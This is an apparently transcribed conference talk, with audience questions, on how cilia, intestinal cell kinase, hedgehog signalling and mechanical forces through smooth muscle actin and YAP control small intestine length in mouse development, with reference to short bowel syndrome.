A couple of disclosures. I have no financial conflicts of interest; in the U.S. we always have to disclose that. Secondly, I have bad hearing. I can only hear in my left ear, and I have a hearing aid here which doesn't work very well. Third, I have terrible back problems. I'll be happy to show you my x-rays and MRIs afterwards. It means that I have to lean on something all the time and I'll probably have to sit down. When I teach, in the U.S. we get all this feedback from students and we're evaluated on it, and I have occasionally gotten feedback that I was so bored with my teaching that I was sitting during my lectures. It wasn't that I was bored, it was just that I was in pain. So I have a question to begin with. I know that this is a very famous institute for mathematics, and I was told by one of the chairwomen of this session that some of the audience are actually famous mathematicians, or young mathematicians, who were very bored with what they were hearing about biology. How many people, maybe I could get a show of hands, are mathematicians or non-biologists? There are no mathematicians or physicists or anyone like that? Can I go see if they're in the lobby? Can I teach an applied math course? Sorry? I teach an applied math course. Are you a mathematician? No. Not a pure one. But applied math is fine, I don't care. I'll take that. So I'll give you a little bit of personal math background. I'm not a very good mathematician at all. You're coming in? I have one. You're a mathematician, sir? Yes. Okay, another mathematician. They brought in some ringers. Do we have any more? There's a dog also. More mathematicians and a mathematical dog. Good, good. So, as I was saying before you people came in, ladies and gentlemen, I know this is a very famous mathematics institute. I've had a lot of mathematician friends; I know about Bourbaki. I myself am not a good mathematician, but my late father was a fairly good mathematician, or rather, he was a physicist. He got his PhD in physics from Columbia in 1951. He's been long dead. I can tell you that he grew up in New York City, and in 1939 he was captain of his high school math team, which won the New York City Mathematics Championship for high schools. He got his PhD in physics from Columbia in 1951 and was a postdoc at the Courant Institute, so I imagine you know what that is. I have three children; our two older ones are not at all interested in science and they weren't good mathematicians, but our 14-year-old is very good, much better than I ever was. Next year I know he'll be taking calculus, which is pretty good for a 14-year-old, I think, much better than I was; I didn't take calculus till I was 16. So anyway, I know something about mathematical talent: I don't have it, but some of my relatives did. My name is Mostov; there's a George Mostow, of Mostow rigidity, who's probably related to me. He passed away in... Pardon? I think you mean it's Mostow, with a W. Yes, but they're all translated from the Cyrillic, and back in those days it was usually translated with a W or an -off when they came through immigration at Ellis Island. It doesn't matter. They're all shortened; it was a Ukrainian name, Mostovoy, and it was all shortened from that.
It's a Ukrainian Jewish name, so it doesn't really matter how it was translated. I have letters in the original Cyrillic, Ukrainian or Russian, and I studied Russian in school, so I know how it was translated. It doesn't matter how it's spelled in English. Okay, so I don't really know the details of Mostow rigidity. He passed away two years ago, but we're probably related; I'm told that all Mostovoys are related. So who's the... Sorry? Time's up. Time's up. Pardon? It's done. Okay, well, that's the most interesting result I have to report. Now for the rest of you, my talk only takes 35 minutes, and I got up here at 3:06. For the rest of you, many of you in the audience know me as a cell biologist. I was a student of Gunter Blobel, who passed away three weeks ago. You know me from the membrane traffic field, and I'm not going to talk about membrane traffic at all. I'm going to talk about classic, straight-up developmental biology, which many of you are probably not very familiar with. It has a lot of background in it, including some bioengineering and geometry, so I'm going to actually talk about geometry today, classic Euclidean geometry. This work was all done by Yang Yang, a postdoc in my lab, in collaboration with Jeremy Reiter's lab at UCSF. And the overview, and this is all work that's known: most internal organs in metazoa are made of epithelial tubes. Tubes have a characteristic length and diameter. The small intestine, which exists in chordates, vertebrates and their relatives, has a characteristic length, and the control of that length is a fundamental and almost completely unsolved problem. Most people aren't even aware of it as a problem. The control of epithelial tube length in general in vertebrates is a largely unsolved problem. And there's a clinical correlate, short bowel syndrome, a severe disease of intestinal length, which is an unsolved problem clinically. Now, the new data, to summarize, is that, surprisingly, primary cilia control small intestine length through the hedgehog signaling pathway. I will explain everything in here; an earlier version of this talk a year ago was designed for a UCSF faculty lunch, which includes mathematicians and chemists, so I'll explain every term. Loss of function of intestinal cell kinase, which is a poorly understood kinase and a cilia gene, causes a short intestine. Other cilia genes also control intestinal length. And hedgehog signaling works through mechanical forces involving smooth muscle actin and YAP, which is an abbreviation for Yes-associated protein, in mesenchymal cells. I'll explain every word in here, so don't worry. So we're going to start with one of the simplest metazoans. Metazoa means simply multicellular animals, as opposed to plants or single-cell organisms. One of the simplest, and one of my favorite organisms, is Hydra, and, excuse me, related things like jellyfish. So basically, can we have the lights down a little bit? Hydra are one of the simplest types of metazoa; they contain two tissue layers. They have an endoderm, which lines the interior cavity, because they basically have an interior cavity, and they contain an ectoderm, which lines the exterior. These are both layers of epithelia, that is, a single layer of cells that form like a layer of bricks, and they have some loose cells in between, such as neurons.
This is from a standard textbook by Bruce Alberts, one of the original great textbooks of cell biology, from 1983. I'd just like to mention that in 1983 I was still in grad school, and completely unrelated work of mine was in this book; it's always very gratifying when you're still in grad school and your own work is in the book, but it's not related to this story. Okay, so most internal organs in metazoa are made of epithelial tubes, and just to give some examples, this is a cast of the branching airways in a mammalian lung, this is a diagram of the branching tubes that make up a mammalian kidney, this is a diagram of the branching tubes that make up the circulation of a human being, and this is a diagram of the airways that make up what's called the trachea of the embryo of a fruit fly, from Mark Krasnow's lab. This is the only one where we understand how it's formed, but it's formed in a completely different manner than all the ones in mammals; for instance, it's formed without any cell division, so it's a completely different way of forming things. Now, we're going to focus today on one model system, which is the human digestive system. Those of us who ate lunch a few hours ago, that lovely buffet, started by chewing our food in our mouth, then it went down our esophagus and into our stomach, and then our small intestine, and our large intestine, and out the rectum and the anus, and that is really one continuous tube. I went to medical school once upon a time for the simple reason that I was a good Jewish boy, and in the United States in a certain period every good Jewish boy went to medical school, and those of you like Dave Drubin here who failed to do that probably disappointed their mothers. I wasn't smart enough to be a physicist like my father. I should add that when I was in graduate school, in a government-funded MD-PhD program that the US government likes to fund, when I was around 23 or so, I managed to sort of explain to my father, the physicist, what I was working on, and he had one comment to me, which was: if you have to do experiments you must not be very smart. And he told me how he did his PhD, basically his whole thesis work, in about six weeks: the first week was doing the work, and the next five weeks were writing it down. Then he got my mother, who was engaged to him and knew how to type, to come over to his apartment and type it up, and she said that was the hardest thing she ever did, because there were subscripts to the subscripts and superscripts to the superscripts, and his whole PhD thesis was about 30 or 40 pages. So anyway, let's continue. Now we're going to talk about mechanical engineering, because I got this figure out of a handbook of mechanical engineering: every tube has a diameter, a wall thickness, and a length, and that applies to the vertebrate gastrointestinal tract. I showed you that, but a schematic of it is that we have an esophagus, a stomach, a small intestine with different segments, and a large intestine. This happens to be a diagram of a mature chicken, which is what I could find a diagram of in a textbook. But you'll notice each part here has a length. It's very characteristic and reproducible from one individual to the next, a characteristic diameter and length. And what controls that? Why are they so reproducible from one individual to the next, unless you're a mutant?
How reproducible is it? Do we have good data on how reproducible it is? I don't know that I have statistics that I could find, but I think if you have genetically homogeneous individuals, like in mice... Humans are sort of outbred, although in the grand scheme of things they're not really outbred. I mean, if you have a 4-foot-6 person and a 6-foot-10 person, and I'm sorry, I can't translate that into meters right now, it's going to vary. But if you take inbred mouse strains, I think they're probably, well, I'll show you why it's not measured in a minute. So I'll tell you why we don't know exactly, but I think in an inbred mouse strain they're probably pretty reproducible. I don't know the exact answer; I'll show you in a minute why we don't know. Very good, because if you have a 10% change in intestinal length, you know you have inflammation if it gets shorter. Okay, so a 10% change is a big change. Well, I'll tell you in a minute why nobody measures intestinal length in the mouse. But I'll tell you that for the adult small intestine, in both a mouse and a person, we know exactly how it's organized and exactly how it's made, through the work of a lot of people, but especially, in the last 15 years, the lab of Hans Clevers in the Netherlands. This goes back really 50 years or more, but in molecular terms the small intestine is organized into what are called crypts, which are invaginations below the surface, and villi, and the whole point of the villi is to increase the surface area, because the role of the small intestine is to absorb nutrients out of the lumen, and you want a maximum amount of surface area. And we know how these cells are produced: there are stem cells here. This is one of the best understood stem cell systems in the adult, the other being in the blood. The stem cells turn over slowly, and then their daughters go through what are called rapidly dividing transit-amplifying cells, and they move up like an escalator through the villus and get sloughed off here. This whole process takes three to five days, and they're shed here at the villus tips, and they go through a differentiation process. They form four, or actually five, different differentiated types of cells as they go up; one type actually goes backwards, down. And one of the remarkable things, and the control of this whole process is very well known in detail, is that if you kill off one of these systems and you transplant a single stem cell, a single stem cell can regenerate this whole crypt-villus unit. So we know how this regenerates. Regeneration of adult organs is a major field of medicine; we all want to be able to regenerate missing organs, and this is one example where you can do that very efficiently. Now, development of this in the mouse or in the human is very well understood. It's much easier to study in the mouse because you can manipulate it genetically and you can go in, kill the mouse, and study the mouse embryo at will. One doesn't like to do this in humans, normally, so in humans you have to depend on abortions or spontaneous abortions and so forth. But the mouse takes 20 days to develop from conception, and you start to see things at around what's called embryonic day 13.5. You always deal with half days because you assume the mouse mates in the middle of the night and then you come in around noon; that's half a day. This is just the convention.
So at about embryonic day 13.5 you have a single, simple layer of epithelium, and around 15.5 you have villi, but no crypts. The crypts in a mouse, and in a human, don't really start to form until after birth. In the adult you have these crypt-villus units with different cell types. So going back to this, excuse me, I need a glass of water. Only in France can you get this nice fizzy water without having to go to some fancy system. Remember, we talked about how you have a characteristic diameter, like the stomach being very wide, and you have a characteristic length. Now, the control of the length is a fundamental and almost completely unanswered question, unlike diameter. And why is length so hard to measure? This is why I said, when someone asked this, I think in the front row, that we're talking about geometry here, although I suppose you would say this isn't really geometry because we don't have any Euclidean proofs. Why is it so hard to know? Well, the problem is that the intestinal epithelial tube is tightly coiled by the associated connective tissue. When you dissect it out, what you get is this tightly coiled bundle, and there's connective tissue that holds it in this tightly coiled bundle. Even for a very skilled, practiced dissector, it takes 15 or 20 minutes to dissect the tube free from the connective tissue, and the tube then collapses. So it takes about 15 or 20 minutes of work to do this, and no one ever bothers, which is why... oh yes, Tommi? Why don't you just do an MRI? Well, you can do this now on people or on babies. I don't know that anyone has gotten this working on the mouse routinely. Maybe you could do this now on mice, but it's not part of the routine characterization that I know of. If you look through dozens and dozens of phenotypic reports of mouse mutants, I've never seen anyone report on intestinal length. It's just not done; it's not part of the phenotypic report. I suppose with MRI maybe it could be done. I think it could be done, but it isn't; I haven't seen it done. Pardon? It will be. It will be, maybe. I haven't seen it done, so it's not routinely done at this point. So when someone characterizes a new mouse mutant that dies at some point, either in utero or at birth or sooner or later, it's not a routine part of the procedure. Okay, let me just say this. You can now routinely knock genes out; there are about 20,000 genes in the mouse genome, or the human genome, and people are systematically knocking them all out. A lot of them have no phenotype under normal lab conditions, which doesn't mean anything by itself, because it may be that they have a phenotype under some kind of stressful condition, or a phenotype when they are combined with some other knockout or some other mutant, meaning what's called a synthetic phenotype. And there's a whole standard list: if you have a mouse that dies at birth or dies in late embryogenesis, there's a whole long list of things that are normally measured or normally examined. Intestinal length is just never examined, in anything that I've ever seen. So that's why we don't have data on intestinal length. Okay, I think I have my slides out of order. Oh, I'm sorry, going the wrong way. Okay.
So there are some humans that are born with very short intestines, and this is called short bowel syndrome. In these people, babies generally, the small intestine is so short that they do not have adequate nutrient absorption. As I mentioned, the main role of the small intestine is to absorb nutrients, and if it's more than about 50 to 70% shorter than normal, you don't have adequate nutrient absorption, and the baby is basically malnourished and starves to death. This has high morbidity and mortality. There are 9,000 cases per year in the US. The only treatment is IV nutrition, and that works very poorly in the long term; they essentially die because you can't get really adequate nutrition that way. There are treatments that don't work in the long term, and the only cure is an intestinal transplant, and that generally doesn't work in the long term either. There have been mutations in a few genes that have been mapped; these are just the abbreviated names of these genes, but there's been little further investigation of them. And one thing I'll mention here is that regeneration of the length of the small intestine, which I'm not going to talk about directly, is a long-term goal. Now, radially, as I said, a single stem cell can regenerate an entire crypt-villus axis, and it can actually make it bigger than normal; if you stress the intestine, the intestine can get wider than normal. But longitudinally, the small intestine never regenerates in length. So if it's too short at birth, it doesn't get longer. It normally grows a great deal; a baby's small intestine is much shorter than a full-grown adult's small intestine. But if it's 50% too short at birth, it will be 50% too short in the adult, if it lives that long. So our goal is that if we understand the control of the length of the small intestine, it may ultimately enable some kind of therapy to increase or regenerate the length of the small intestine in short bowel syndrome. A lot of cases of short bowel syndrome arise because, for some external reason, part of the small bowel has to be removed, for instance if it's damaged, and I won't go into all of that. Now, intestinal cell kinase, which I will talk about at some length to explain to everybody, and I'll tell you that the biologists here, the mathematicians, and everyone in between probably don't know about it, provided us with a serendipitous clue to intestinal length control. Intestinal cell kinase is a ubiquitous serine/threonine kinase. For those of you who are mathematicians: kinases are enzymes that add phosphate groups to proteins and are involved in signaling. It's pretty obscure; it hasn't been studied much at all, and it belongs to a very obscure family of kinases. It's particularly abundant in intestine, but it's found in most cell types. Now, the way we got into it is that it was a substrate of a cell cycle-related kinase, which Ying Yang was studying as a PhD student in the lab of Tomi Mäkelä at the University of Helsinki before she came to my lab as a postdoc. And another little bit of serendipity: she wanted to come to the Bay Area because her husband was a computer scientist. She came from someplace in China to do her PhD with Tomi Mäkelä because he had a fellowship available, and her husband came to graduate school in Helsinki to study computer science.
And he worked some years ago for Nokia, when Nokia sort of really existed as a cell phone company. And he helped develop this cell phone game called Angry Birds, which some of you probably have heard of if you're old enough. And so Nokia sort of went broke. But Facebook was interested in cell phone games. And so they hired him. And so he moved first to the Bay Area to work at Facebook. I have a connection to Facebook, unfortunately. I never use Facebook or any social media. But the guy who founded Facebook was his name, Zuckerberg. His wife was a medical student at UCSF. And so since I teach all the first year medical students, I give them one lecture on epithelial cells. And so I must have taught her some years ago for better or for worse, although I have no memory of this. My lecture now on epithelial is now on the web. So they don't even get to see me in person. They just get to watch me as a talking head with slides on the web. So here we go. OK. Now, intestinal cell kinase. You don't have to concern yourself with any of these details. But there's a way of making a mutant mouse that lacks it. And you can just buy the sperm for this. As I said, all the genes, every gene in the mouse has been knocked out by some consortia. And you can just buy the mutant sperm and breed the mice. And she made an intestinal cell kinase knockout mouse. And while she was doing this, two other labs published the same mouse. But she was very thorough. And unlike these other two labs, she dissected out the small intestine because she didn't know better that no one bothers to dissect it out. And so she dissected out the small intestine. And lo and behold, it was shorter. So I'm going to use this pointer. So this is the small intestine, stomach, small intestine, the cecum, which is a structure that at the end of the small intestine, dividing the small intestine from the colon. And mice, I think, don't have an appendix. Oh, yeah, they do. They do it here. The appendix is what gets taken out by doctors in all the movies and things. And the small intestine was shorter in the mutants. And so it's much shorter. So this is actually a graph. Over time, 13 and 1 half days through 18 and 1 half days, you can see by 18 and 1 half days it's much shorter. This is the wild type. And this is the mutant. The large intestine is also shorter, but it's harder to measure as reproducibly. So possible mechanisms by this happens. So one is that there could be decreased proliferation of the cells. She's done just one experiment to look at this. It's promising. So one way of measuring proliferation is you inject into the mice a nucleotide, a called EDU, which is an analog of thymidine, which gets incorporated into the DNA and is fluorescent. You can detect it fluorescently. And so the blue is a mutant. And the black is the wild type. You can see there's a small, but statistically somewhat significant difference here. These are the epithelial cells. And these are the mesenchymal cells that surround it. I'm going to explain that more in a minute. She needs to reproduce this using different variations of this experiment. There are a few other possible mechanisms. It could be cell death. It could be more cell death in the mutant. We haven't detected that. And there could be a change in orientation of cell division. That is, the cells, when they divide, you could have the cells instead of dividing next to each other in the longitudinal axis, they could divide next to each other in the radial axis, the circular axis, around the circle. 
If that happened, the tube would become wider instead of longer. And that actually happens in lung airway development, as shown by our colleagues at UCSF, in Gail Martin's and Wallace Marshall's labs. The airways, as they branch, change their diameter and their length. But the shortened intestines that we see are unchanged in diameter, at least as far as we've measured it. So let's talk about intestinal cell kinase. Intestinal cell kinase is concentrated in primary cilia, which I'll explain, though it is also present in cells that lack cilia completely. So could cilia be involved in intestinal length control? There's no previously reported link between cilia and intestinal length, and there's no previously reported link between cilia and any aspect of intestinal development. Okay, so what are cilia? Cilia comes from the Latin word for eyelash, as in supercilious; I don't know if that's a word in French. It's a Latin word meaning, roughly, raised eyebrows. So is that a word in French? Eyebrows? Cilia? I don't know; I'm just trying to explain this to the non-biologists. Cilia are little projections, very skinny little projections, from the surface of the cell. This is what they look like by scanning EM, and this is what they look like if stained with an appropriate marker. Primary cilia: most cells in the body have one cilium projecting from them, which is non-motile. There are other kinds of cilia that are motile and whip back and forth. Cilia have a core of microtubules that is called the axoneme, and they have a membrane surrounding them. At the base they have a centriole that turns into a basal body. Cilia contain more than 500 proteins, and mutations in any of the genes that code for these proteins cause diseases called ciliopathies. There are at least 125 known ciliopathies, and many of them affect many organs: the retina, skeleton, liver, cardiac defects, brain, kidney; kidney cysts are one of the most common. But notably, the small intestine is not known to be affected. Now I need to sit down; my back is really getting to me. Don't think I'm really bored, okay? As I said, I have terrible back problems and I just can't stand, and I think some of the people who came in late missed my point that I'll be glad to show you my back x-rays if you want. Can we see them? Pardon? Can we see them? I don't want to talk about it, but I have slides of them. I have scoliosis with a 72-degree curve. So this is a normal mouse at E16.5, and this is an ICK mutant mouse. It's got facial distortions, polydactyly, that is extra digits, gross edema, and face problems. It corresponds to the human disease ECO syndrome, endocrine-cerebro-osteodysplasia, which is perinatal lethal. The mice, and probably the humans, die of respiratory failure at birth because the lungs are messed up, so they can't breathe when they're born. It's very rare in terms of cases reported, but I think that's probably because, first off, it resembles a number of other perinatal lethal syndromes, and the only way you can diagnose it is by sequencing. In places with advanced healthcare, if you do an ultrasound, you'll see a grossly distorted fetus that's incompatible with life, and it would get aborted because it's going to die at birth, and for those aborted fetuses, generally no one is going to pay for sequencing. Although I did tell some people that I had my own genome recently sequenced for $350, from a new company called Genos.co.
And $350 is quite cheap. People used to talk about a $1,000 genome, but now you can get it done for $350; still, no one's going to pay for that usually. And if it's in a place that doesn't have advanced healthcare, it'll just be stillborn. Most of the cases that have been reported are in consanguineous families, which tend to be in places that don't have advanced healthcare. So it's not easy to diagnose; you can only diagnose it by sequencing, because it resembles a number of other severe ciliopathies. Now, the cilium is assembled and maintained by intraflagellar transport, which was discovered by Joel Rosenbaum at Yale using Chlamydomonas as a model system, because there you can see things most clearly. There's anterograde transport and retrograde transport, which move particles up and down. Depletion of ICK causes a bulge at the cilium tip. This is the ICK-depleted cell. This was in cell culture, although you actually do see this in cultured fibroblasts from the ICK mutant. That is generally characteristic of a decrease in retrograde transport: things get to the tip and then accumulate there. And what Ying did was collaborate with Hiro Ishikawa in Wallace Marshall's lab at UCSF, who has the TIRF microscope, and he could do live imaging of IFT cargo in IMCD cells, which have long cilia in culture. So he measured the rate of IFT, anterograde, which was unchanged, and retrograde, which was decreased. This is an actual movie of live imaging, so we can measure the velocities. So with loss of ICK, there was a reduction in retrograde intraflagellar transport and accumulation of cargo at the tip of the cilium. Now, Jeremy Reiter's lab at UCSF had three other severe ciliopathy mutants that all die around birth, perinatal lethal, and they all have associated human ciliopathies that are also perinatal lethal. INPP5E is a lipid phosphatase concentrated in cilia; B9D1 and TCTN3, tectonic 3, are required for cilia formation. They're all expressed in the fetal small intestine, and he had made the mice for these. All of them also had short intestines: here, the INPP5E, B9D1, and tectonic 3 mutants had short small intestines. They were less severe, but that could simply be a matter of penetrance, or of timing, of when they actually get turned on in the small intestine. So, summary part one, and I know I'm covering a lot: the length of the small intestine, and of epithelial tubes in general, is an unsolved and fundamental problem. I keep telling Ying, with a view to when she goes on the job market again, that she's sort of discovered a whole new problem that people have just been ignoring. The only people who have worked on tube length are in Drosophila trachea, which is a different thing; it's post-mitotic, it takes place without cell division. And there's the translational relevance of short bowel syndrome, and the small intestine never regenerates in length. Everybody talks about regenerative medicine, and this is a whole area that is wide open. And ICK and three other cilia genes control intestinal length. Okay, now, the second issue, where we get into real developmental biology, and I've got some very elementary slides here. So, an epithelium. I've been studying epithelia my whole career, my whole graduate school career, since 1979, when I started grad school with Gunter Blobel, who just passed away three weeks ago at Rockefeller. He had spent 51 years at Rockefeller and won the Nobel Prize.
So an epithelium is a tightly packed layer of cells that divides one surface from another. It's a topological division. In biology, you can think of it as a two-dimensional surface; it's really not exactly two-dimensional, but you think of it as a two-dimensional thing. Underneath the epithelium is a basal lamina, a thin layer of connective tissue, extracellular matrix, and underneath that, during development, is a layer of mesenchymal cells, which are loosely packed. This is development, okay, loosely packed cells. Now, during development there is bidirectional signaling between the epithelium and the mesenchyme by several signaling pathways, which are the blue arrows. One major pathway is the Hedgehog pathway, which was discovered, of course, in Drosophila, and named hedgehog because in the great classic screen by Eric Wieschaus and Christiane Nüsslein-Volhard, done at the European Molecular Biology Laboratory, the EMBL, for which they won the Nobel Prize years ago, the mutant flies looked like hedgehogs. Hedgehogs, of course, only live in the Old World; they're not indigenous to the New World, although I'm told, and I've read, that one species of hedgehog that comes from Africa, a type of desert hedgehog, has become very popular as a pet in the US and elsewhere. We thought about getting them as pets for the lab, but they're illegal to have as pets in California, it turns out, so that ended that idea. Anyway, the Hedgehog signaling pathway requires, in vertebrates, cilia, although it actually does not require cilia in flies, as it turns out. It was Kathryn Anderson who discovered that the Hedgehog signaling pathway needs cilia for signaling in mammals, but not in flies. The hedgehog pathway involves a hedgehog ligand, which is secreted by one type of cell, generally epithelia, and binds to a receptor called Patched on the receiving cell, and Patched is on cilia. So the receiving cell requires intact cilia for hedgehog signaling to function. When the pathway is off, Patched is in the cilium, and Smoothened is on the cell surface but not in the cilium. This is a simple diagram of the cilium; the cilium here is drawn rather short, just to fit it in. But when hedgehog ligand comes along, it binds to Patched, and that causes Smoothened to move from inside the cell to the ciliary membrane, and that causes Gli, which stands for glioblastoma, actually, to bind to the microtubules inside the cilium. Gli gets proteolytically processed and moves into the nucleus; it is processed to what's called a Gli activator, binds to the DNA in the nucleus, and causes transcription of hedgehog-responsive genes. This whole hedgehog pathway is involved in developmental events in many, many different tissues; it is a major developmental pathway in many different tissues, including, we think, control of intestinal length. Okay, so now: hedgehog ligand, in many tissues, is generally secreted by epithelial cells and binds to the Patched receptor on the cilia of mesenchymal cells. One particular reason for thinking this is the case in the intestine is that in the small intestine, the intestinal epithelial cells generally don't have cilia, except at very early times. They have cilia at embryonic day 13.5, but they lose them within a few days after that, and by embryonic day 15 or 16 the cilia are gone.
But the mesenchymal cells have cilia all the time. So what we think is happening is that the epithelial cells are secreting hedgehog ligand, and it's acting on cilia on the mesenchymal cells. Now, one way to test this is that we can delete ICK specifically in the mesenchyme, and this involves some engineering trickery that's been developed. Dermo1 is a promoter that drives expression of genes in mesenchymal cells, and it, oops, that's not me, is it? Okay, it expresses Cre, which is a recombinase that acts on these floxed (loxP) sites. This is some modern-day genetic engineering, which causes the excision, the loss, of ICK specifically in the mesenchyme. The loss of ICK specifically in the mesenchyme causes a short small intestine. We can see that here, at embryonic day 15.5 and embryonic day 17.5, the black versus the white. So ICK is therefore acting in the mesenchyme, and I can just tell you, if we do the reverse experiment and lose ICK just in the epithelium, it has no effect at all; I'm not showing you that. Now, I'm just going to show you some old results published by Andy McMahon's lab in 2010, with Junhao Mao. Andy McMahon did this experiment when he was at Harvard; he now directs an institute at the University of Southern California, and Junhao Mao, I think, was at the University of Massachusetts when he did these experiments. When these guys deleted the hedgehog ligands, and there are two of them in the intestine that are redundant, sonic hedgehog and Indian hedgehog, and I'll tell you that sonic hedgehog is actually named after the Sonic the Hedgehog video game character. When you delete both of them, because they're overlapping and redundant, this is the entire intestinal tract, from the stomach all the way out, the small intestine, large intestine, and the whole intestinal tract shrinks by 90%, not just the 70% or so that we can get, but 90%, because it's a much more efficient, complete shortening. So this is their old result; Andy McMahon is one of the titans of the hedgehog field in mice. So we know that hedgehog is needed for this, but we wanted to go on and find out how. I talked to Andy about this, I don't know, two years ago or something, and he said, oh, it's just hedgehog. But then, as a cell biologist, I said, well, how does hedgehog do this? Andy's content to just say it's hedgehog, but I want to know how hedgehog does this. Well, first off, two factors that are downstream of hedgehog, or needed for hedgehog to work, Gli, which is the transcriptional activator, and Ptch (Patched), which is the receptor, are decreased in the ICK knockout relative to the control. That's Gli here and Ptch here, and you can see they're both decreased, the black bars versus the white bars. So how did the decrease in hedgehog signaling lead to short intestines? We asked: could a change in mechanical force be involved? Because everybody in cell biology has been working on mechanical force, and I have to say we were partly inspired by Cliff Tabin, who is my classmate from my undergraduate days in Chicago, and his student Amy Shyer, who's now a fellow at Berkeley, as Dave Drubin can tell us. You know Amy, don't you? She's one of these fellows at... She's in Richard Harland's. Yeah, she's in Richard Harland's lab.
And so there's the epithelium, which is a single layer, and it's surrounded by mesenchymal cells, and some of those mesenchymal cells are precursors to the smooth muscle cells that surround the intestinal epithelium. So I showed you the mesenchymal cells. Now, our intestine has a single layer of epithelium, which absorbs the nutrients, and it's surrounded by, you know, as I mentioned, I teach histology, or I used to teach histology, to medical students. When I was a medical student in 1977... am I running out of time? Okay, then I'll stop telling stories. Okay, so some of the mesenchymal cells become smooth muscle cells, and these smooth muscle cells contain alpha smooth muscle actin, which can produce mechanical force. So here, in the control, we stain for smooth muscle actin in green, and blue is just the nuclei, the DNA. And in the intestinal cell kinase mutant, the smooth muscle actin is very disorganized, and we know from other people's work that smooth muscle actin that is disorganized like that probably produces much less mechanical force. Then there's this protein called YAP, which everybody works on now. YAP, which stands for Yes-associated protein, is a key mechanosensitive transcriptional regulator. Both biochemical and mechanical cues control the movement of YAP between the cytoplasm and the nucleus. In the cytoplasm YAP is inactive, but when it moves into the nucleus, it becomes a major regulator of cell proliferation and organ size control. YAP is here in red, and you can see that in the control a lot of it is in the nucleus, but here a lot of it is in the cytoplasm; it's diffuse, so you don't see it, and that corresponds especially to where it colocalizes with a lot of the smooth muscle actin, which is much more disorganized compared to the control. So, to summarize again: the length of the intestine, and of tubes, is an unsolved problem; there is short bowel syndrome; the small intestine never regenerates in length; and a number of cilia genes control intestinal length. Cilia likely control intestinal length through hedgehog signaling in the mesenchyme; hedgehog probably acts through mechanical force generated by smooth muscle actin in the mesenchymal cells surrounding the epithelial cells; and that force probably acts through YAP, the mechanosensitive transcriptional regulator. So, Yang Yang did all this work, with help from Jeremy Reiter's lab, Wallace Marshall and Hiro Ishikawa, and Tomi Mäkelä, who started this with Peckett Pavinet, an undergrad who actually came to visit us one summer two years ago, and Johann Piranen, who's in Tomi's lab, with funding from the usual suspects. Thank you. I'm sorry to take up so much time about math, but you did make me start eight minutes late. Tommi has a question? I can never answer his questions. Yes, go ahead. Try. Try. Yeah. In the last part of your talk, how do you establish that the relationship is causal and not correlative? Causal and not correlative: we haven't yet, but we are going to. And the way you presented it, you said it was... I said may; I always had a may or a might. But we're doing experiments like killing all these smooth muscle actin cells. We're in the middle of doing this; actually, we have some results that are looking indicative. You use a smooth muscle actin promoter hooked up to diphtheria toxin, and that kills the smooth muscle actin-expressing cells.
And that restores the length of the intestine. So it's the opposite. What? The opposite, right? No. If you get rid of smooth muscle actin contractility... Yes. What? Is this right? Yes, the opposite. I'm trying to remember this. If you have no contractility, well, it doesn't make it short or long; we're going to make it short, okay? But we're also manipulating YAP activity. You manipulate YAP activity and you manipulate actin contractility, and you manipulate those independently of the upstream things like the cilia. We're manipulating those things independently, and that can establish causality, or at least begin to establish causality. That's the basic key. Keep your questions coming over here. In what cells do you see changes in YAP? In what? In the epithelial or the mesenchymal cells? Mesenchymal. YAP is mostly active in epithelial cells. Well, these cells are... That's where it controls cell survival and cell proliferation. Well, here we're seeing... I don't know that YAP is important in mesenchymal cells. No, here we're seeing it in mesenchymal cells, okay? It's interesting; these cells are the ones that generate mechanical force. It's strange. No, but YAP is in a lot of cells. Yeah, but the YAP phenotypes are usually epithelial. Well, here we're seeing it in mesenchymal cells, and we will manipulate it. As I said to Tommi, our plans, and I don't know if we have a result yet, are to manipulate YAP and actin independently of the cilia and hedgehog. Okay, so that will give us something. Yes? What is the ICK target? ICK is a kinase. I know, but what is the target? Well, okay, so we are doing that using the Kevan Shokat techniques; with those, using an artificial substrate, you can identify the direct target. But that's not the point. Is hedgehog phosphorylated by ICK? Pardon? Is hedgehog phosphorylated by ICK? Okay, I can't hear well. Is hedgehog phosphorylated by ICK? I don't know, but the issue is that it doesn't matter, because other cilia genes, which are not kinases, give the same phenotype. So it's not ICK per se; it's cilia that are needed. Ah. Okay? Three other cilia genes give the same phenotype, so it's not limited to ICK; ICK was fortuitous. Yes, the question is why ICK is required for cilia. No, ICK is not required for cilia. ICK stimulates retrograde transport, but ICK is not required for cilia. And at least three other cilia genes, which are not kinases, give the same phenotype. Okay, so... At which stage of embryonic development is this length being determined? I'm sorry, I can't hear you. At which stage of embryogenesis is the length, the length of the intestine, being determined? At each stage? Which stage? It's a continuous process, so it's not decided at a single point where the developmental anomaly happens; it's a long process. Yes, and it continues postnatally; I mean, the intestine continues to grow until the organism reaches adulthood. I see. So does the anomaly affect all of development, or does it make things slower everywhere, or what? Does it become slower everywhere, or does something stop, some stage stop, or does everything become slower at some stage? I don't know that that's known. But I know that the intestine continues to grow in a human; the intestine is approximately three times body length. Now, it varies among species, depending on the diet.
So in general, carnivores have shorter intestines and herbivores have longer intestines. That's a species difference, and that's a very different question. No, no, no. My question is time. Time dependence, yeah. Yeah. Time dependence. I don't know that that's been studied in great detail, but it's growing throughout both embryogenesis and postnatally until you reach full adult length. But anomaly happens at which stage? When you see something develops slower, it's kept as early or later? Both. And when we see it? What's the first stage? What difference do you mean? Perhaps we should continue this at the coffee break. Yeah. The two of you. So let's thank Keith while he's searching for the picture. Yay, and thank you for your job, and good luck.
|
Most internal organs consist of tubes lined by a single layer of epithelial cells; these tubes usually have a characteristic length. For most organs, little is known about how the length of these tubes is controlled. For example, the small intestine of mammals has a defined length, yet very little is known about the mechanisms that control this length. If a portion of the small intestine is damaged due to disease or injury, either embryonically or postnatally, the length of the small intestine never regenerates. We have uncovered a portion of the pathway that controls the length of the small intestine during embryonic development.
|
10.5446/50892 (DOI)
|
